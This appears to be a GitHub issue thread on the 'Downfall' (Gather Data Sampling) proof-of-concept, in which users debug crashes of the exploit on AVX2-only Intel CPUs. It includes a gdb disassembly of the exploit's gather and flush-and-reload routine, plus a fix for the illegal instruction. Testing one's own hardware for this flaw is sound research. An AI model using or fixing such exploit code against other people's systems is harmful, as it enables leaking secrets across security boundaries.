illegal instruction on avx2

[theAeon]

Hi-I was attempting to test the vulnerability of a Xeon e3v5 chip using your POC (as intel doesn't feel like listing whether or not its vulnerable for some reason) and I'm running into an illegal instruction error that i don't believe is a mitigation-disassembly below:

Dump of assembler code for function s_load_encode:
   0x0000000000407000 <+0>:     vmovups (%rdi),%ymm3
=> 0x0000000000407004 <+4>:     vpxord %ymm1,%ymm1,%ymm1
   0x000000000040700a <+10>:    vpcmpeqb %ymm2,%ymm2,%ymm2
   0x000000000040700e <+14>:    lea    0x260c000,%rdi
   0x0000000000407016 <+22>:    clflush (%rdi)
   0x0000000000407019 <+25>:    mov    (%rdi),%rax
   0x000000000040701c <+28>:    clflush 0x40(%rdi)
   0x0000000000407020 <+32>:    mov    0x40(%rdi),%rax
   0x0000000000407024 <+36>:    clflush 0x80(%rdi)
   0x000000000040702b <+43>:    mov    0x80(%rdi),%rax
   0x0000000000407032 <+50>:    clflush 0xc0(%rdi)
   0x0000000000407039 <+57>:    mov    0xc0(%rdi),%rax
   0x0000000000407040 <+64>:    clflush 0x100(%rdi)
   0x0000000000407047 <+71>:    mov    0x100(%rdi),%rax
   0x000000000040704e <+78>:    clflush 0x140(%rdi)
   0x0000000000407055 <+85>:    mov    0x140(%rdi),%rax
   0x000000000040705c <+92>:    clflush 0x180(%rdi)
   0x0000000000407063 <+99>:    mov    0x180(%rdi),%rax
   0x000000000040706a <+106>:   clflush 0x1c0(%rdi)
   0x0000000000407071 <+113>:   mov    0x1c0(%rdi),%rax
   0x0000000000407078 <+120>:   mov    0x0,%rdi
   0x0000000000407080 <+128>:   lea    0x260d000,%r13
   0x0000000000407088 <+136>:   vpgatherdd %ymm2,0x0(%r13,%ymm1,1),%ymm5
   0x000000000040708f <+143>:   vpermd %ymm5,%ymm3,%ymm5
   0x0000000000407094 <+148>:   movq   %xmm5,%rax
   0x0000000000407099 <+153>:   mov    %rax,%rbx
   0x000000000040709c <+156>:   mov    %rax,%rcx
   0x000000000040709f <+159>:   mov    %rax,%rdx
---Type <return> to continue, or q <return> to quit---

[flowyroll]

I think if you change the vpxord to vpxor, it should work. I forgot to fully test this on older machines that doesn't support AVX-512. I will issue a patch when find some time.

[theAeon]

Yeah, that did it. Now it hangs(?) at Flush+Reload Threshold: 179 with no further printing. Unsure if broken or if that means we're clear.

[canertol]

Hi Daniel,
I had a similar problem. Changing the vpxord to vpxor solved the illegal instruction error, but now it hangs without any output. When I run it with gdb, I get the following segfault:

Starting program: /home/caner/github/downfall/POC/gds_test/gds 0 0 4
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff7a49700 (LWP 24597)]

Thread 1 "gds" received signal SIGSEGV, Segmentation fault.
s_load_encode () at asm.S:224
224         vpgatherdd %ymm2, 0(%r13, %ymm1, 1), %ymm5

I tried to use the same experiment setup as the paper. I have Core i7-8650U CPU with Ubuntu 20.04.6 LTS and Linux 5.15.0-48-generic.
Do you have any ideas about what might be causing this? Did you use a different configuration specific to this CPU?

Thanks!